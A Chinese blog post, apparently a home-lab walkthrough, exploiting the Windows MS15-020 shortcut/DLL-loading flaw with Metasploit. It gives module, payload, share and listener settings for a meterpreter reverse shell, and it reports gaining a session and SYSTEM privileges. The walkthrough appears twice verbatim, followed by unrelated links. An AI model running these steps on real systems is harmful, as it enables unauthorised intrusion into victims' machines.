MS15-020漏洞测试
2016-04-26 17:27
806 查看
名称:Microsoft DLL植入远程代码执行漏洞(CVE-2015-0096)(MS15-020)
了解:Microsoft Windows没有正确处理DLL文件的加载,存在远程代码执行漏洞,通过诱使用户打开远程WebDAV或SMB共享上的某些文件利用此漏洞,
成功利用后可导致加载任意库。Windows使用.lnk来定义文件或者目录的快捷方式,可以使用.CPL文件来自定义图标。问题是,在Windows中,图标从模块(或者可执行文件或动态链接库)加载。
事实上,.cpl文件实际上是DLL文件。因为攻击者可以定义哪些可执行模块会被加载,攻击者可以利用.LNK文件来执行任意代码。
实验环境:
共享主机win7:192.168.1.3
入侵主机linux:192.168.1.7
受害者主机XP:192.168.10
打开终端输入命令:
msfconsole //启动msf(metasploit framework)
search ms15 //搜索关键字相关漏洞
use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader //漏洞利用模块
info //查看漏洞相关信息
set payload windows/meterpreter/reverse_tcp //设置一个反弹shell
设置好参数,设置漏洞利用模块列表的UNCHOST和UNCSHARE
set UNCHOST 192.168.1.3 //我设置为我的另一台主机地址 就是你开着共享那台机器的地址
set UNCSHARE share //设置共享文件的文件夹 这里主机192.168.1.3在C盘下的share里文件夹开启了共享 提前创建好共享
set LHOST 192.168.1.7 //设置漏洞成功利用后后门连接的地址
exploit //执行漏洞
exploit后会发现生成了几个文件,
我们去生成的目录下把文件拷贝到共享主机的共享文件夹下
复制到共享主机后,在启动MSF进行配置刚才的后门进行监听...输入命令
1. use exploit/multi/handler
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST 192.168.1.7
4. exploit
受害者访问共享后,
成功了触发了漏洞
可以发现入侵者这边弹回来了一个回话session 1,简单点说就是一个后门,这里我顺便提了下权,可以看见system权限。
实验结束,下班,关门,回家。
了解:Microsoft Windows没有正确处理DLL文件的加载,存在远程代码执行漏洞,通过诱使用户打开远程WebDAV或SMB共享上的某些文件利用此漏洞,
成功利用后可导致加载任意库。Windows使用.lnk来定义文件或者目录的快捷方式,可以使用.CPL文件来自定义图标。问题是,在Windows中,图标从模块(或者可执行文件或动态链接库)加载。
事实上,.cpl文件实际上是DLL文件。因为攻击者可以定义哪些可执行模块会被加载,攻击者可以利用.LNK文件来执行任意代码。
实验环境:
共享主机win7:192.168.1.3
入侵主机linux:192.168.1.7
受害者主机XP:192.168.10
打开终端输入命令:
msfconsole //启动msf(metasploit framework)
search ms15 //搜索关键字相关漏洞
use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader //漏洞利用模块
info //查看漏洞相关信息
set payload windows/meterpreter/reverse_tcp //设置一个反弹shell
设置好参数,设置漏洞利用模块列表的UNCHOST和UNCSHARE
set UNCHOST 192.168.1.3 //我设置为我的另一台主机地址 就是你开着共享那台机器的地址
set UNCSHARE share //设置共享文件的文件夹 这里主机192.168.1.3在C盘下的share里文件夹开启了共享 提前创建好共享
set LHOST 192.168.1.7 //设置漏洞成功利用后后门连接的地址
exploit //执行漏洞
exploit后会发现生成了几个文件,
我们去生成的目录下把文件拷贝到共享主机的共享文件夹下
复制到共享主机后,在启动MSF进行配置刚才的后门进行监听...输入命令
1. use exploit/multi/handler
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST 192.168.1.7
4. exploit
受害者访问共享后,
成功了触发了漏洞
可以发现入侵者这边弹回来了一个回话session 1,简单点说就是一个后门,这里我顺便提了下权,可以看见system权限。
实验结束,下班,关门,回家。
相关文章推荐
- 冲刺第四天
- LaTex技巧[22]:LaTex插图命令includegraphics参数详解
- SharePoint 2013 Foundation 报错: 试图调用服务应用程序时报告了失败: EndpointFailure 8313
- Table configuration with catalog null, schema orcl, and table ORDERS did not resolve to any tables
- int main(int argc, char **argv)中参数argc与argv的意义
- Spark组件之Spark Streaming学习3--结合SparkSQL的使用(wordCount)
- Nginx日志切割
- Java简繁转换ZHConverter
- notepad++编辑的json文件copy到myEclipse后中文乱码
- string stringBuffer stringBuilder 区别
- [No000085]C#反射Demo,通过类名(String)创建类实例,通过方法名(String)调用方法
- 详解C语言中条件判断语句if和switch的用法
- cf665e.cpp 01 trie树求抑或
- 关于如何使用Jeesite快速开发笔记
- 【Mac工具箱】独孤九剑!一名全栈设计师的Mac工具箱(设计/开发/效率)
- 闪屏界面的实现分析
- springmvc的请求过滤器(session过期)
- 关于android使用已有id,自己的id和系统id
- redis配置密码认证
- nginx添加ip访问频率限制